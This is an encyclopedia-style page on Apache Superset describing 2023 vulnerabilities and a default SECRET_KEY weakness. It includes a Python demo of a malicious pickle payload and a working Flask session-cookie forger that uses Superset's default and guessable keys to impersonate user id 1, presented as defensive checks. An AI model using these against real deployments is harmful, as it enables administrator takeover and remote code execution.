The name of the base system (platform): | Apache |
Last Release Date: | 2023/09/07 |
Technology: | BI |
Apache Superset is an open source BI platform.
2023: Loss of access and data awaits users of older versions of Apache Superset
The Apache Software Foundation has released updates that close two vulnerabilities in the Superset analytics platform. Exploiting them (CVE-2023-39265 and CVE-2023-37941) lets an attacker gain remote access to and control over the system. This became known on September 7, 2023.
The 2.1.1 release also fixes a separate REST API permission flaw (CVE-2023-36388) that let low-privileged users mount SSRF attacks.
According to security researchers at Horizon3, Superset was designed from the start to give privileged users access to arbitrary databases and the ability to run SQL queries against them. If an attacker can point that capability at Superset's own metadata database, they can read the configuration and stored credentials, reach the data it indexes, and ultimately execute arbitrary code on the server.
CVE-2023-39265 is a bypass of the URI validation that is supposed to stop users from connecting to the SQLite metadata database; with the check bypassed, arbitrary read and write operations on the metadata become possible. The same CVE also covers missing validation when database connection definitions are imported from a file, which lets an attacker smuggle such a connection in through a crafted import.
CVE-2023-37941 lets an attacker plant an arbitrary payload in the metadata store and have it executed remotely. The root cause is the use of Python's pickle library to serialize stored data: anyone who can write a record to the metadata database can insert a malicious pickle that is deserialized, and therefore executed, on the server when it is read back.
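As an added illustration (not code from Superset or from the Horizon3 write-up), the following Python shows the mechanism behind CVE-2023-37941 in miniature: an object whose `__reduce__` names a callable, a naive `pickle.loads` that runs that callable on load, and a restricted unpickler that refuses any global not on an explicit allowlist. The class names, the environment-variable side effect and the allowlist contents are constructed for the demo and are not Superset's own types; a real payload would name `os.system` or `subprocess.Popen` instead of `exec` with a harmless string.

```python
"""Why pickle in a metadata store is a code-execution sink, and the allowlist that closes it."""
import io
import os
import pickle


class ReportCache:
    """A benign object an application might legitimately store as a pickle (constructed)."""

    def __init__(self, name, rows):
        self.name = name
        self.rows = rows


class MaliciousRecord:
    """Constructed attacker object. pickle calls __reduce__ to serialise it, and the
    callable it returns is invoked when the blob is unpickled. Here the callable is
    exec with a string that only sets an env var, so the effect is observable but harmless."""

    def __reduce__(self):
        return (exec, ("import os; os.environ['PICKLE_DEMO_RAN'] = 'yes'",))


def build_malicious_blob() -> bytes:
    """What an attacker with write access to the metadata store would insert."""
    return pickle.dumps(MaliciousRecord())


def build_benign_blob() -> bytes:
    """A legitimate record, to show the hardened loader still accepts real data."""
    return pickle.dumps(ReportCache("sales", [1, 2, 3]))


def unsafe_load(blob: bytes):
    """The vulnerable pattern: trust whatever row comes back from the database."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Only resolves globals on an allowlist, so a blob cannot name exec, os.system
    or any other callable to run at load time. Everything else raises."""

    ALLOWED_GLOBALS = {(ReportCache.__module__, "ReportCache")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(blob: bytes):
    """The hardened pattern: same data format, but no arbitrary global resolution."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def safe_load_rejects(blob: bytes) -> bool:
    """True if the restricted loader refuses the blob."""
    try:
        safe_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


def payload_ran() -> bool:
    """Did the constructed payload's side effect happen in this process?"""
    return os.environ.get("PICKLE_DEMO_RAN") == "yes"


if __name__ == "__main__":
    os.environ.pop("PICKLE_DEMO_RAN", None)
    unsafe_load(build_malicious_blob())
    print("naive pickle.loads ran the payload:", payload_ran())
    print("restricted loader rejects it:", safe_load_rejects(build_malicious_blob()))
    print("restricted loader still loads benign data:", safe_load(build_benign_blob()).rows)
```

An allowlisting unpickler is a mitigation, not a cure: the right fix for a store that untrusted users can write to is to stop using pickle for it altogether (JSON or another data-only format), which is the direction the 2.1.1 fix takes for the affected records.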
Other flaws fixed in the latest Superset release include:
- an arbitrary MySQL file read that can be used to pull credentials out of the database;
- abuse of the load_examples command to obtain the metadata database URI from the user interface and modify the data stored there;
- default credentials for the metadata database in some Superset configurations;
- plaintext credential leakage when the "/api/v1/database" endpoint is queried as a privileged user.
The researchers recommend generating a unique SECRET_KEY for every Superset deployment instead of keeping the default value. Superset is a Flask application, and SECRET_KEY signs its session cookies: anyone who knows the key can forge a valid session for any user, including the first administrator, without a password. A random key closes that door.
According to Horizon3, more than 2,000 of the roughly 4,000 Superset servers exposed on the internet still use default keys, and about 70 use guessable keys such as "superset" or "123456".
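Added example, not part of the article or of Superset's code base: a stdlib-only reconstruction of the cookie format Flask produces (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1 with HMAC key derivation), used both to forge a session for user id 1 under a known key and to test a captured cookie against a list of candidate keys, which is the check a defender would run on their own deployment. The first candidate is the value shipped in Superset's default config.py (its octal escapes written out as bytes); the other two are the guessable examples the article quotes; the session fields are the ones Flask-Login uses (`_user_id`, `_fresh`). The candidate list and the sample sessions are constructed for the demo.

```python
"""Check a Superset (Flask) session cookie against default or guessable SECRET_KEY values."""
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import time
import zlib

# Keys to try. First: the default from Superset's config.py; then the two
# guessable values the article quotes. Illustrative list, extend for your estate.
CANDIDATE_KEYS = [
    b"\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",
    b"superset",
    b"123456",
]

SALT = b"cookie-session"  # Flask's SecureCookieSessionInterface salt


def _b64(data: bytes) -> bytes:
    """itsdangerous-style URL-safe base64 without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret: bytes) -> bytes:
    """itsdangerous key_derivation="hmac" with sha1, as Flask configures it."""
    return hmac.new(secret, SALT, hashlib.sha1).digest()


def forge_session_cookie(secret: bytes, session: dict, timestamp: int | None = None) -> str:
    """Produce <payload>.<timestamp>.<signature>, the itsdangerous URLSafeTimedSerializer
    layout. With a known SECRET_KEY this is all an attacker needs to become user id 1."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    body = _b64(payload)
    if len(compressed) < len(payload) - 1:  # itsdangerous compresses only when it pays off
        body = b"." + _b64(compressed)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    signed_value = body + b"." + _b64(ts_bytes)
    signature = hmac.new(_derive_key(secret), signed_value, hashlib.sha1).digest()
    return (signed_value + b"." + _b64(signature)).decode()


def verify_session_cookie(cookie: str, secret: bytes) -> dict | None:
    """Return the session dict if the HMAC checks out under `secret`, else None.
    Only the key is checked; a real consumer also enforces max_age on the timestamp."""
    parts = cookie.encode().rsplit(b".", 2)
    if len(parts) != 3:
        return None
    body, ts_b64, sig = parts
    signed_value = body + b"." + ts_b64
    expected = _b64(hmac.new(_derive_key(secret), signed_value, hashlib.sha1).digest())
    if not hmac.compare_digest(expected, sig):
        return None
    try:
        if body.startswith(b"."):
            data = zlib.decompress(_b64d(body[1:]))
        else:
            data = _b64d(body)
        return json.loads(data)
    except (ValueError, zlib.error):
        return None


def find_weak_key(cookie: str, candidates=CANDIDATE_KEYS) -> bytes | None:
    """The defender's check: does any known default or guessable key validate this cookie?"""
    for key in candidates:
        if verify_session_cookie(cookie, key) is not None:
            return key
    return None


if __name__ == "__main__":
    # Constructed cookies: one from a deployment left on the default key, one from a random key.
    weak = forge_session_cookie(CANDIDATE_KEYS[0], {"_user_id": "1", "_fresh": True})
    strong = forge_session_cookie(b"a-long-random-secret-generated-once", {"_user_id": "1"})
    print("default-key cookie matched:", find_weak_key(weak))
    print("random-key cookie matched:", find_weak_key(strong))
```

To run the check against a live instance, log in with an unprivileged account, copy the `session` cookie and pass it to `find_weak_key`; any hit means every session on that server can be forged. The fix is a 32+ byte random SECRET_KEY (for example from `openssl rand -base64 42`), after which existing sessions are invalidated and, for Superset, stored database passwords encrypted under the old key need rotating.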
The researchers see the root of many of these problems in the fact that the Superset web interface allowed connections to its own metadata database in the first place. That opens the way to manipulating both configuration and data from an ordinary analyst's seat.
The developers have promised to restrict access to the metadata database further and to generate SECRET_KEY automatically. Users are strongly advised to install the latest updates and to review their security settings.
Vulnerabilities in open source products such as Superset can pose serious risks to the organizations that run them. The researchers urge operators to track releases and apply them promptly, to configure the system correctly, and never to leave default credentials or keys in place [1].
2021: Apache Superset features
Among the features of Apache Superset for June 2021:
- Open Scalable Architecture
- BI Platform/Data Management Platform Bundle
- Multiple DBMSs for different tasks
- No License Fees
- Can be modified and extended by the adopter
Notes
- ↑ [https://www.securitylab.ru/news/541587.php Loss of access and data awaits users of older versions of Apache SuperSet].